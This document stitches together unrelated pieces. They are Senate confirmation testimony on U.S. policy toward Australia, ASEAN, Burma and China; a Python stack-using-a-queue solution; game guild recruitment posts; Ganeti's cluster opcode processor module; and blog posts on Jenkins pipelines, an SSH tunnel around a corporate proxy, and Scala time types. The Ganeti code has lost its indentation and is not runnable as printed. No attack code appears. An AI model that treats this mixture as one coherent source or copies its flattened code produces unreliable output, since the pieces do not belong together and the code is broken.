Australia is one of America's closest friends and allies. We work with Australia on almost every issue, and we are thankful for Australia's stalwart friendship, support and counsel. Our relations with New Zealand are the strongest they have been in many years as we work together on global and regional challenges from the Antarctic to Afghanistan. While the small size and populations of many Pacific Island countries sometimes cause them to be overlooked, our ties are deep, and if confirmed, I look forward to the opportunity to strengthen those ties with our many friends in the Pacific.
One of our most urgent tasks is responding to the global economic crisis. It is worth highlighting that four Asian economies (China, Japan, the Republic of Korea, and Taiwan) are now among our top twelve trading partners. Today, the 21 APEC economies purchase some 60 percent of U.S. exports. The strong Asian representation in APEC, the WTO, and the G-20 reflects the increasing importance of Asian economies and their centrality in strengthening the multilateral trading system and recovering from the current financial and economic crisis. I am committed to close U.S. coordination with Asian economies to mitigate the downturn's impact on their economies and ours, and to spur regional and global economic recovery.
In this respect, Mr. Chairman, I would like to note the opportunities for expanded engagement that lie before us in Southeast Asia. Taken together, the ASEAN countries represent our second largest export market in Asia, at $68 billion, just less than China. ASEAN is the largest multi-country destination for private investment from the U.S., at $130 billion. As the countries in Southeast Asia integrate under the ASEAN Community, including the goal of creating a single market, we can expect the importance of our economic, political, educational and cultural ties with this dynamic and variegated part of East Asia to continue to grow.
The United States and ASEAN are now beginning our fourth decade as Dialogue Partners and ASEAN has just brought into force its new Charter, which provides a framework for much greater regional cooperation on economic, political, human rights and social issues. While the pace of ASEAN's evolution is unlikely to be dramatic, if we look at its changes over a period of several years, the picture is clearly one of increasing activity, relevance, and willingness to grapple with new challenges. The United States must match the changes underway in ASEAN and ASEAN member countries with renewed engagement which ensures continuation of a strong partnership.
Thailand and the Philippines stand as valued U.S. allies. The United States is working closely with the Government of the Philippines to overcome a persistent terrorist threat through an integrated effort to bolster military capabilities, improve institutions, and foster balanced, sustainable development. Our alliance with Thailand, a major non-NATO ally, provides a critical platform for projecting U.S. efforts in Southeast Asia and beyond. As the Thai people and their leaders struggle to emerge from recent internal tensions and grapple with how to strengthen democratic political institutions, they can count on the steadfast support and goodwill of the United States.
The Administration recently concluded three full days of discussions with Indonesian officials to define the contours of a Comprehensive Partnership that the President of Indonesia and Secretary Clinton called for, and Secretary Clinton met on Monday with Foreign Minister Wirajuda to discuss the partnership and other issues. Our relationship with Indonesia has expanded significantly in recent years, coincident with the growth of Indonesian democracy. It is entirely appropriate that the engagement between the world's second and third largest democracies has grown to embrace new areas of cooperation. The scope of an effective partnership can certainly extend beyond bilateral topics, as we join together to address regional and global issues such as protecting biodiversity, conservation of tropical forests and extensive coral reefs, improving global peace-keeping capabilities, intensified cooperation in science and education, and restoring balance and growth to the global economy.
Mr. Chairman, the people of Burma deserve better than what they now have. As Secretary Clinton said in Jakarta, neither our sanctions-based approach nor ASEAN's engagement approach has worked, so the Administration is reviewing policy options with the goal of finding more effective ways to encourage dialogue among the military, the opposition, and the ethnic nationalities, release of political prisoners, and broad-based reform. The recent actions by the Burmese Junta against Aung San Suu Kyi are deeply troubling and we are factoring these developments into our ongoing policy review. While I cannot prejudge the outcome of the policy review, I can say that my approach – if confirmed – will be to engage widely with Congress, with our partners in the region, and with people who know Burma in order to come up with practical, realistic ideas on how we can best encourage Burma to move in a more positive direction.
Last but certainly not least, I want to speak about our relationship with China. The U.S.-China relationship is complex, it is developing rapidly, and it is one of the most consequential of our bilateral relationships.
President Obama agreed with President Hu at the G-20 Summit in London that both the United States and China will seek to build a positive, cooperative and comprehensive relationship for the 21st century. China's rise as an economic power and its growing political and diplomatic influence are developments with global and not merely regional ramifications. Our bilateral engagement with China cuts across a range and depth of issues that would have been unimaginable 20 years ago. We currently convene over 50 bilateral dialogues and working groups spanning subjects from aviation to non-proliferation to food safety.
If confirmed, I will carry out the Administration's objective to expand the cooperative aspects of the bilateral relationship in a way that parallels the complex and comprehensive nature of our engagement with China while further facilitating China's integration into the international system. In this respect, the ability to conduct frank and honest conversations about the difficult issues where we disagree will be an essential element of our approach. The American people expect us to continue the promotion of human rights and religious freedom in China. If confirmed, I will ensure that human rights, religious freedom for all China's citizens, and development of the rule of law and civil society remain strong pillars of our engagement. The situation in Tibet will remain a subject of engagement and concern.
Finally, I support the long-standing U.S. commitment to the one-China policy based on the three Communiqués and the Taiwan Relations Act, which have served to preserve peace and stability across the Strait for the last three decades. We are committed to making available to Taiwan the defense articles and services required for a sufficient self-defense. We welcome recent initiatives from both sides of the Taiwan Strait that have increased interaction and dialogue, and reduced tensions.
Mr. Chairman, let me close by reiterating my fundamental commitment, if confirmed, to do all in my power to ensure that the United States shapes trends in this dynamic region in ways that benefit both our own interests and those of the region as a whole. I strongly believe that close coordination between the executive and the legislative branches will be crucial to this endeavor, and if confirmed I look forward to close cooperation with you, Mr. Chairman, and your colleagues.
|
import collections

class MyStack(object):
    def __init__(self):
        """
        Initialize your data structure here.
        """
        self._queue = collections.deque()

    def push(self, x):
        """
        Push element x onto stack.
        :type x: int
        :rtype: void
        """
        self._queue.append(x)

    def pop(self):
        """
        Removes the element on top of the stack and returns that element.
        :rtype: int
        """
        # Drain all but the last element into a temporary queue, take the
        # last one (the stack top), then restore the rest in their order.
        tempQueue = collections.deque()
        while len(self._queue) > 1:
            tempQueue.append(self._queue.popleft())
        result = self._queue.pop()
        while len(tempQueue) > 0:
            self._queue.append(tempQueue.popleft())
        return result

    def top(self):
        """
        Get the top element.
        :rtype: int
        """
        # Pop the top element, then push it straight back on.
        result = self.pop()
        self._queue.append(result)
        return result

    def empty(self):
        """
        Returns whether the stack is empty.
        :rtype: bool
        """
        return len(self._queue) == 0

# Your MyStack object will be instantiated and called as such:
# obj = MyStack()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.top()
# param_4 = obj.empty()
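A common single-queue alternative to the two-queue drain in `pop` above is to rotate the deque after every push so the newest element always sits at the front; this is a sketch of that variant, not the class above:

```python
import collections

class QueueStack:
    """Stack on one queue: rotate after each push so the top is at the front."""

    def __init__(self):
        self._q = collections.deque()

    def push(self, x):
        self._q.append(x)
        self._q.rotate(1)  # move the new element from the back to the front

    def pop(self):
        return self._q.popleft()  # the front of the queue is the stack top

    def top(self):
        return self._q[0]

    def empty(self):
        return not self._q
```

This makes `push` O(n) and `pop`/`top` O(1), the mirror image of the trade-off in the solution above.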
|
Welcome to Knights of Flame!
In KoF it is important to be active and do your best during events!
To apply send me a PM here on the forum or send a message to me (listrom) on Line!
See above how to apply.
PM me if you are interested and fulfill the requirements.
After a fun second Blitz war, lots of new epics for the guild from the beast chest, and some more guild leveling, we are approaching the max guild level. We currently have opened one new spot and I think we will open a second fairly soon.
If you want to be part of the great KoF community send me a PM and let's talk about it!
Hope to see you guys break into the top 10 for the big war!
It is all good Noir!
We currently have two spots open and are looking for active players.
If you want to join us in our quest for top 10 give us a shout!
PM kofteewin on Line for a chance to join a great guild like Knights of Flame!
We still have 2 spots open and going for top 10 next war. If you want an epic armor, message me on LINE chat @ kofteewin.
If you are looking for a spot in a friendly, social and strong guild for the fusion and other wars we have a spot for you!
Send me a PM here or see first post for line communication.
Looking to participate in a fun guild with high elemental bonuses and a very active community?
Knights of Flame currently have two spots open, PM me here on the forum or see further instructions how to apply in the initial post in this thread!
|
#
#
# Copyright (C) 2006, 2007, 2011, 2012 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Module implementing the logic behind the cluster operations
This module implements the logic for doing operations in the cluster. There
are two kinds of classes defined:
- logical units, which know how to deal with their specific opcode only
- the processor, which dispatches the opcodes to their logical units
"""
import sys
import logging
import random
import time
import itertools
import traceback
from ganeti import opcodes
from ganeti import opcodes_base
from ganeti import constants
from ganeti import errors
from ganeti import hooksmaster
from ganeti import cmdlib
from ganeti import locking
from ganeti import utils
from ganeti import compat
_OP_PREFIX = "Op"
_LU_PREFIX = "LU"
#: LU classes which don't need to acquire the node allocation lock
#: (L{locking.NAL}) when they acquire all node or node resource locks
_NODE_ALLOC_WHITELIST = frozenset([])
#: LU classes which don't need to acquire the node allocation lock
#: (L{locking.NAL}) in the same mode (shared/exclusive) as the node
#: or node resource locks
_NODE_ALLOC_MODE_WHITELIST = compat.UniqueFrozenset([
cmdlib.LUBackupExport,
cmdlib.LUBackupRemove,
cmdlib.LUOobCommand,
])
class LockAcquireTimeout(Exception):
"""Exception to report timeouts on acquiring locks.
"""
def _CalculateLockAttemptTimeouts():
"""Calculate timeouts for lock attempts.
"""
result = [constants.LOCK_ATTEMPTS_MINWAIT]
running_sum = result[0]
# Wait for a total of at least LOCK_ATTEMPTS_TIMEOUT before doing a
# blocking acquire
while running_sum < constants.LOCK_ATTEMPTS_TIMEOUT:
timeout = (result[-1] * 1.05) ** 1.25
# Cap max timeout. This gives other jobs a chance to run even if
# we're still trying to get our locks, before finally moving to a
# blocking acquire.
timeout = min(timeout, constants.LOCK_ATTEMPTS_MAXWAIT)
# And also cap the lower boundary for safety
timeout = max(timeout, constants.LOCK_ATTEMPTS_MINWAIT)
result.append(timeout)
running_sum += timeout
return result
class LockAttemptTimeoutStrategy(object):
"""Class with lock acquire timeout strategy.
"""
__slots__ = [
"_timeouts",
"_random_fn",
"_time_fn",
]
_TIMEOUT_PER_ATTEMPT = _CalculateLockAttemptTimeouts()
def __init__(self, _time_fn=time.time, _random_fn=random.random):
"""Initializes this class.
@param _time_fn: Time function for unittests
@param _random_fn: Random number generator for unittests
"""
object.__init__(self)
self._timeouts = iter(self._TIMEOUT_PER_ATTEMPT)
self._time_fn = _time_fn
self._random_fn = _random_fn
def NextAttempt(self):
"""Returns the timeout for the next attempt.
"""
try:
timeout = next(self._timeouts)
except StopIteration:
# No more timeouts, do blocking acquire
timeout = None
if timeout is not None:
# Add a small variation (-/+ 5%) to timeout. This helps in situations
# where two or more jobs are fighting for the same lock(s).
variation_range = timeout * 0.1
timeout += ((self._random_fn() * variation_range) -
(variation_range * 0.5))
return timeout
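The timeout schedule and jitter above can be sketched in isolation; the constants here are illustrative stand-ins, not Ganeti's actual LOCK_ATTEMPTS_* values:

```python
import random

MINWAIT = 1.0   # illustrative stand-in for constants.LOCK_ATTEMPTS_MINWAIT
MAXWAIT = 15.0  # illustrative stand-in for constants.LOCK_ATTEMPTS_MAXWAIT
TOTAL = 75.0    # illustrative stand-in for constants.LOCK_ATTEMPTS_TIMEOUT

def attempt_timeouts():
    """Growing per-attempt timeouts whose sum reaches at least TOTAL."""
    result = [MINWAIT]
    running_sum = result[0]
    while running_sum < TOTAL:
        # Same growth rule as above: slightly super-linear, then clamped.
        timeout = (result[-1] * 1.05) ** 1.25
        timeout = max(min(timeout, MAXWAIT), MINWAIT)
        result.append(timeout)
        running_sum += timeout
    return result

def jittered(timeout, rnd=random.random):
    """Add a -5%/+5% variation so competing jobs don't retry in lockstep."""
    variation_range = timeout * 0.1
    return timeout + (rnd() * variation_range) - (variation_range * 0.5)
```

Once the list is exhausted, the strategy above falls back to a blocking acquire (timeout `None`), so the schedule only needs to cover the initial contention window.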
class OpExecCbBase: # pylint: disable=W0232
"""Base class for OpCode execution callbacks.
"""
def NotifyStart(self):
"""Called when we are about to execute the LU.
This function is called when we're about to start the lu's Exec() method,
that is, after we have acquired all locks.
"""
def Feedback(self, *args):
"""Sends feedback from the LU code to the end-user.
"""
def CurrentPriority(self): # pylint: disable=R0201
"""Returns current priority or C{None}.
"""
return None
def SubmitManyJobs(self, jobs):
"""Submits jobs for processing.
See L{jqueue.JobQueue.SubmitManyJobs}.
"""
raise NotImplementedError
def _LUNameForOpName(opname):
"""Computes the LU name for a given OpCode name.
"""
assert opname.startswith(_OP_PREFIX), \
"Invalid OpCode name, doesn't start with %s: %s" % (_OP_PREFIX, opname)
return _LU_PREFIX + opname[len(_OP_PREFIX):]
def _ComputeDispatchTable():
"""Computes the opcode-to-lu dispatch table.
"""
return dict((op, getattr(cmdlib, _LUNameForOpName(op.__name__)))
for op in opcodes.OP_MAPPING.values()
if op.WITH_LU)
def _SetBaseOpParams(src, defcomment, dst):
"""Copies basic opcode parameters.
@type src: L{opcodes.OpCode}
@param src: Source opcode
@type defcomment: string
@param defcomment: Comment to specify if not already given
@type dst: L{opcodes.OpCode}
@param dst: Destination opcode
"""
if hasattr(src, "debug_level"):
dst.debug_level = src.debug_level
if (getattr(dst, "priority", None) is None and
hasattr(src, "priority")):
dst.priority = src.priority
if not getattr(dst, opcodes_base.COMMENT_ATTR, None):
dst.comment = defcomment
def _ProcessResult(submit_fn, op, result):
"""Examines opcode result.
If necessary, additional processing on the result is done.
"""
if isinstance(result, cmdlib.ResultWithJobs):
# Copy basic parameters (e.g. priority)
for new_op in itertools.chain(*result.jobs):
    _SetBaseOpParams(op, "Submitted by %s" % op.OP_ID, new_op)
# Submit jobs
job_submission = submit_fn(result.jobs)
# Build dictionary
result = result.other
assert constants.JOB_IDS_KEY not in result, \
"Key '%s' found in additional return values" % constants.JOB_IDS_KEY
result[constants.JOB_IDS_KEY] = job_submission
return result
def _FailingSubmitManyJobs(_):
"""Implementation of L{OpExecCbBase.SubmitManyJobs} to raise an exception.
"""
raise errors.ProgrammerError("Opcodes processed without callbacks (e.g."
" queries) can not submit jobs")
def _VerifyLocks(lu, glm, _mode_whitelist=_NODE_ALLOC_MODE_WHITELIST,
_nal_whitelist=_NODE_ALLOC_WHITELIST):
"""Performs consistency checks on locks acquired by a logical unit.
@type lu: L{cmdlib.LogicalUnit}
@param lu: Logical unit instance
@type glm: L{locking.GanetiLockManager}
@param glm: Lock manager
"""
if not __debug__:
return
have_nal = glm.check_owned(locking.LEVEL_NODE_ALLOC, locking.NAL)
for level in [locking.LEVEL_NODE, locking.LEVEL_NODE_RES]:
# TODO: Verify using actual lock mode, not using LU variables
if level in lu.needed_locks:
share_node_alloc = lu.share_locks[locking.LEVEL_NODE_ALLOC]
share_level = lu.share_locks[level]
if lu.__class__ in _mode_whitelist:
assert share_node_alloc != share_level, \
"LU is whitelisted to use different modes for node allocation lock"
else:
assert bool(share_node_alloc) == bool(share_level), \
("Node allocation lock must be acquired using the same mode as nodes"
" and node resources")
if lu.__class__ in _nal_whitelist:
assert not have_nal, \
"LU is whitelisted for not acquiring the node allocation lock"
elif lu.needed_locks[level] == locking.ALL_SET or glm.owning_all(level):
assert have_nal, \
("Node allocation lock must be used if an LU acquires all nodes"
" or node resources")
class Processor(object):
"""Object which runs OpCodes"""
DISPATCH_TABLE = _ComputeDispatchTable()
def __init__(self, context, ec_id, enable_locks=True):
"""Constructor for Processor
@type context: GanetiContext
@param context: global Ganeti context
@type ec_id: string
@param ec_id: execution context identifier
"""
self.context = context
self._ec_id = ec_id
self._cbs = None
self.rpc = context.rpc
self.hmclass = hooksmaster.HooksMaster
self._enable_locks = enable_locks
def _CheckLocksEnabled(self):
"""Checks if locking is enabled.
@raise errors.ProgrammerError: In case locking is not enabled
"""
if not self._enable_locks:
raise errors.ProgrammerError("Attempted to use disabled locks")
def _AcquireLocks(self, level, names, shared, opportunistic, timeout):
"""Acquires locks via the Ganeti lock manager.
@type level: int
@param level: Lock level
@type names: list or string
@param names: Lock names
@type shared: bool
@param shared: Whether the locks should be acquired in shared mode
@type opportunistic: bool
@param opportunistic: Whether to acquire opportunistically
@type timeout: None or float
@param timeout: Timeout for acquiring the locks
@raise LockAcquireTimeout: In case locks couldn't be acquired in specified
amount of time
"""
self._CheckLocksEnabled()
if self._cbs:
priority = self._cbs.CurrentPriority()
else:
priority = None
acquired = self.context.glm.acquire(level, names, shared=shared,
timeout=timeout, priority=priority,
opportunistic=opportunistic)
if acquired is None:
raise LockAcquireTimeout()
return acquired
def _ExecLU(self, lu):
"""Logical Unit execution sequence.
"""
write_count = self.context.cfg.write_count
lu.CheckPrereq()
hm = self.BuildHooksManager(lu)
h_results = hm.RunPhase(constants.HOOKS_PHASE_PRE)
lu.HooksCallBack(constants.HOOKS_PHASE_PRE, h_results,
self.Log, None)
if getattr(lu.op, "dry_run", False):
# in this mode, no post-hooks are run, and the config is not
# written (as it might have been modified by another LU, and we
# shouldn't do writeout on behalf of other threads)
self.LogInfo("dry-run mode requested, not actually executing"
" the operation")
return lu.dry_run_result
if self._cbs:
submit_mj_fn = self._cbs.SubmitManyJobs
else:
submit_mj_fn = _FailingSubmitManyJobs
try:
result = _ProcessResult(submit_mj_fn, lu.op, lu.Exec(self.Log))
h_results = hm.RunPhase(constants.HOOKS_PHASE_POST)
result = lu.HooksCallBack(constants.HOOKS_PHASE_POST, h_results,
self.Log, result)
finally:
# FIXME: This needs locks if not lu_class.REQ_BGL
if write_count != self.context.cfg.write_count:
hm.RunConfigUpdate()
return result
def BuildHooksManager(self, lu):
return self.hmclass.BuildFromLu(lu.rpc.call_hooks_runner, lu)
def _LockAndExecLU(self, lu, level, calc_timeout):
"""Execute a Logical Unit, with the needed locks.
This is a recursive function that starts locking the given level, and
proceeds up, till there are no more locks to acquire. Then it executes the
given LU and its opcodes.
"""
glm = self.context.glm
adding_locks = level in lu.add_locks
acquiring_locks = level in lu.needed_locks
if level not in locking.LEVELS:
_VerifyLocks(lu, glm)
if self._cbs:
self._cbs.NotifyStart()
try:
result = self._ExecLU(lu)
except AssertionError as err:
# this is a bit ugly, as we don't know from which phase
# (prereq, exec) this comes; but it's better than an exception
# with no information
(_, _, tb) = sys.exc_info()
err_info = traceback.format_tb(tb)
del tb
logging.exception("Detected AssertionError")
raise errors.OpExecError("Internal assertion error: please report"
" this as a bug.\nError message: '%s';"
" location:\n%s" % (str(err), err_info[-1]))
elif adding_locks and acquiring_locks:
# We could both acquire and add locks at the same level, but for now we
# don't need this, so we'll avoid the complicated code needed.
raise NotImplementedError("Can't declare locks to acquire when adding"
" others")
elif adding_locks or acquiring_locks:
self._CheckLocksEnabled()
lu.DeclareLocks(level)
share = lu.share_locks[level]
opportunistic = lu.opportunistic_locks[level]
try:
assert adding_locks ^ acquiring_locks, \
"Locks must be either added or acquired"
if acquiring_locks:
# Acquiring locks
needed_locks = lu.needed_locks[level]
self._AcquireLocks(level, needed_locks, share, opportunistic,
calc_timeout())
else:
# Adding locks
add_locks = lu.add_locks[level]
lu.remove_locks[level] = add_locks
try:
glm.add(level, add_locks, acquired=1, shared=share)
except errors.LockError:
logging.exception("Detected lock error in level %s for locks"
" %s, shared=%s", level, add_locks, share)
raise errors.OpPrereqError(
"Couldn't add locks (%s), most likely because of another"
" job who added them first" % add_locks,
errors.ECODE_NOTUNIQUE)
try:
result = self._LockAndExecLU(lu, level + 1, calc_timeout)
finally:
if level in lu.remove_locks:
glm.remove(level, lu.remove_locks[level])
finally:
if glm.is_owned(level):
glm.release(level)
else:
result = self._LockAndExecLU(lu, level + 1, calc_timeout)
return result
# pylint: disable=R0201
def _CheckLUResult(self, op, result):
"""Check the LU result against the contract in the opcode.
"""
resultcheck_fn = op.OP_RESULT
if not (resultcheck_fn is None or resultcheck_fn(result)):
logging.error("Expected opcode result matching %s, got %s",
resultcheck_fn, result)
if not getattr(op, "dry_run", False):
# FIXME: LUs should still behave in dry_run mode, or
# alternately we should have OP_DRYRUN_RESULT; in the
# meantime, we simply skip the OP_RESULT check in dry-run mode
raise errors.OpResultError("Opcode result does not match %s: %s" %
(resultcheck_fn, utils.Truncate(result, 80)))
def ExecOpCode(self, op, cbs, timeout=None):
"""Execute an opcode.
@type op: an OpCode instance
@param op: the opcode to be executed
@type cbs: L{OpExecCbBase}
@param cbs: Runtime callbacks
@type timeout: float or None
@param timeout: Maximum time to acquire all locks, None for no timeout
@raise LockAcquireTimeout: In case locks couldn't be acquired in specified
amount of time
"""
if not isinstance(op, opcodes.OpCode):
raise errors.ProgrammerError("Non-opcode instance passed"
" to ExecOpcode (%s)" % type(op))
lu_class = self.DISPATCH_TABLE.get(op.__class__, None)
if lu_class is None:
raise errors.OpCodeUnknown("Unknown opcode")
if timeout is None:
calc_timeout = lambda: None
else:
calc_timeout = utils.RunningTimeout(timeout, False).Remaining
self._cbs = cbs
try:
if self._enable_locks:
# Acquire the Big Ganeti Lock exclusively if this LU requires it,
# and in a shared fashion otherwise (to prevent concurrent run with
# an exclusive LU).
self._AcquireLocks(locking.LEVEL_CLUSTER, locking.BGL,
not lu_class.REQ_BGL, False, calc_timeout())
elif lu_class.REQ_BGL:
raise errors.ProgrammerError("Opcode '%s' requires BGL, but locks are"
" disabled" % op.OP_ID)
try:
lu = lu_class(self, op, self.context, self.rpc)
lu.ExpandNames()
assert lu.needed_locks is not None, "needed_locks not set by LU"
try:
result = self._LockAndExecLU(lu, locking.LEVEL_CLUSTER + 1,
calc_timeout)
finally:
if self._ec_id:
self.context.cfg.DropECReservations(self._ec_id)
finally:
# Release BGL if owned
if self.context.glm.is_owned(locking.LEVEL_CLUSTER):
assert self._enable_locks
self.context.glm.release(locking.LEVEL_CLUSTER)
finally:
self._cbs = None
self._CheckLUResult(op, result)
return result
def Log(self, *args):
"""Forward call to feedback callback function.
"""
if self._cbs:
self._cbs.Feedback(*args)
def LogStep(self, current, total, message):
"""Log a change in LU execution progress.
"""
logging.debug("Step %d/%d %s", current, total, message)
self.Log("STEP %d/%d %s" % (current, total, message))
def LogWarning(self, message, *args, **kwargs):
"""Log a warning to the logs and the user.
The optional keyword argument is 'hint' and can be used to show a
hint to the user (presumably related to the warning). If the
message is empty, it will not be printed at all, allowing one to
show only a hint.
"""
assert not kwargs or (len(kwargs) == 1 and "hint" in kwargs), \
"Invalid keyword arguments for LogWarning (%s)" % str(kwargs)
if args:
message = message % tuple(args)
if message:
logging.warning(message)
self.Log(" - WARNING: %s" % message)
if "hint" in kwargs:
self.Log(" Hint: %s" % kwargs["hint"])
def LogInfo(self, message, *args):
"""Log an informational message to the logs and the user.
"""
if args:
message = message % tuple(args)
logging.info(message)
self.Log(" - INFO: %s" % message)
def GetECId(self):
"""Returns the current execution context ID.
"""
if not self._ec_id:
raise errors.ProgrammerError("Tried to use execution context id when"
" not set")
return self._ec_id
I can't quite believe it but it's actually almost a year since I moved away from an entirely-Cloudbees-based build-and-deploy chain to a far more higgledy-piggledy, yet much more satisfactory, best-of-breed chain.
In that time this setup has built a helluva lot of software, both open-source libraries and closed-source moonlighting apps, and I've learnt a helluva lot too. Time to share.
The pipeline/flow should kick off the instant something is pushed to master. Waiting 59 seconds because we just missed the poll is wasteful. If we're using a modern source-control system, there is absolutely no reason to be periodically polling it for changes. It's the 21st century; last century's batch-processing techniques aren't useful here.
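As a concrete sketch of push-over-poll: the Jenkins Git plugin exposes a notifyCommit endpoint that a server-side hook can hit the moment a push lands. The host and repo URLs below are placeholders, not from any real setup:

```shell
# Hypothetical post-receive hook: push-notify Jenkins that the repo changed,
# instead of having Jenkins poll on a schedule.
JENKINS_URL="https://jenkins.example.com"
REPO_URL="git@example.com:myteam/myapp.git"
NOTIFY_URL="${JENKINS_URL}/git/notifyCommit?url=${REPO_URL}"
echo "Notifying Jenkins: ${NOTIFY_URL}"
# curl -fsS "${NOTIFY_URL}"   # uncomment in a real hook
```

Jenkins then triggers any job whose configured repository matches the URL, so the build starts within seconds of the push rather than on the next poll.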
The build must begin with a clean to ensure repeatability. Each and every successful build should be appropriately tagged so that the correlation between git commit ID and Jenkins build number is evident.
Things go wrong. Jenkins configurations get accidentally broken. It should be just as easy to roll back a misconfigured job as it is to roll back a bad code change.
Yes the test environment will be volatile, but as long as the tests are good, it should be good-volatile; aka latest-and-greatest. This puts the onus on developers to write comprehensive, meaningful tests. The test environment should be a glittering showcase of all the awesome that is about to hit prod.
No manual funny-business allowed. Repeatable, reliable, and (ideally) rollback-able from the Jenkins UI.
So at my current site the dreaded Authenticating Proxy policy has been instituted - one of those classic corporate network-management patterns that may make sense for the 90% of users with their locked-down Windows/Active Directory/whatever setups, but make life a miserable hell for those of us playing outside on our Ubuntu boxes.
In a nice display of classic software-developer passive-aggression we've been keeping track of the hours lost due to this change - we're up to 10 person-days since the policy came in 2 months ago. Ouch.
Mainly the problems are due to bits of open-source software that simply haven't had to deal with such proxies - these generally cause things like Jenkins build boxes and other "headless" (or at least "human-less") devices to have horrendous problems.
I got super-tied-up today trying to get one of these build boxes to install something via good-old apt-get in Ubuntu. In the end I used one of my old favourite tricks, the SSH Tunnel backchannel to use the proxy that my dev box has authenticated with, to get the job done.
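A sketch of that backchannel trick, with hypothetical hosts and ports (assuming the authenticated proxy listens on localhost:3128 on the dev box):

```shell
# Step 1 (from the dev box, already authenticated with the corporate proxy):
# reverse-forward the local proxy port onto the headless build box.
#
#   ssh -R 3128:localhost:3128 builder@build-box
#
# Step 2 (on the build box): point apt at the forwarded port.
cat > /tmp/95proxy <<'EOF'
Acquire::http::Proxy "http://localhost:3128";
Acquire::https::Proxy "http://localhost:3128";
EOF
# sudo cp /tmp/95proxy /etc/apt/apt.conf.d/95proxy && sudo apt-get update
```

While the SSH session stays open, apt on the build box tunnels through the proxy session the dev box has already authenticated, so no credentials ever need to live on the headless machine.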
So in my sausagefactory library, my first attempt at adding an extension mechanism was very Java-esque.
Scala will check whether the userConverter is defined at a given input - if not, it'll fall through to the defaultConverter - perfect.
A userConverter only has to worry about converting one type of thing, and doesn't know (or care) about downstream converters. A simplified Chain of Responsibility.
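A minimal sketch of that arrangement using Scala's PartialFunction and orElse; the converter names and String output type are invented for illustration:

```scala
object ConverterChain {
  // A converter is a partial function: defined only for inputs it understands.
  type Converter = PartialFunction[Any, String]

  // A user-supplied converter that only knows about one type of thing:
  val userConverter: Converter = {
    case i: Int => s"int:$i"
  }

  // The library's fallback, defined for everything:
  val defaultConverter: Converter = {
    case other => s"default:$other"
  }

  // orElse tries userConverter first (via isDefinedAt) and falls through
  // to defaultConverter otherwise - a simplified Chain of Responsibility.
  val convert: Converter = userConverter orElse defaultConverter
}
```

So `ConverterChain.convert(42)` takes the user's path while `ConverterChain.convert("x")` falls through to the default, and neither converter knows the other exists.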
Following on from my lightbulb moment, I tried to sketch out what I wanted from a strongly-typed system for representing timezoned instants in time.
I'm only a tiny way down the path to true functional-programming enlightenment. Hell, I've only just started looking at Scalaz, mainly thanks to eed3si9n's excellent tutorials.
(*) Everything is immutable (including within Joda-Time) so "adjustments" naturally result in a new object being returned. Do we have a word yet for "A modified copy of an immutable thing"?
I've quite recently become involved in an after-hours project that has a strong temporal component to it. Basically every interaction with the system will need to be labelled with a time, and they will constantly need to be compared and converted. Add to this the fact that the first beta customers are located on opposite sides of the Pacific, and that events can occur in a further 3 European countries, and a way to safely and unambiguously represent the time of something happening in a time and a place seems paramount.
While Joda Time has undoubtedly made date/calendar/timezone manipulation a happier task for the JVM developer, I'm looking for something stronger. I can pass around a DateTime all day long (no pun intended) but until I inspect its TimeZone I can't be sure where it originated from, or if it is in fact the canonical UTC.
val myTime = new DateTime() // Happens to be in "Europe/Paris"
Which will work just fine most of the time, except when there's been an event in the last hour, when we won't see it. Or is it the other way around? Tricky, isn't it?
There's nothing in the type system to prevent these kinds of runtime problems. It comes down to developer diligence in naming/commenting/testing all the things - literally, every thing that uses a representation of time - to ensure correctness.
But hang on, aren't compilers really, really good at ensuring correctness?
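One way to sketch what "stronger" could look like - distinct types for canonical-UTC and zone-local readings, so mixing them is a compile error rather than a late-night production surprise. The names (UtcMillis, LocalMillis) are hypothetical, not from any library:

```scala
// Canonical UTC instant: the only type that supports comparison.
final case class UtcMillis(value: Long) {
  def isBefore(other: UtcMillis): Boolean = value < other.value
}

// A zone-local reading: carries its zone, and must be explicitly
// converted before it can be compared with anything.
final case class LocalMillis(value: Long, zone: String) {
  def toUtc(offsetMillis: Long): UtcMillis = UtcMillis(value - offsetMillis)
}

// UtcMillis(0).isBefore(LocalMillis(0, "Europe/Paris"))  // does not compile
```

The "last hour" bug from above simply cannot be written here: the compiler refuses to compare a LocalMillis with a UtcMillis until someone has said, explicitly, how to get from one to the other.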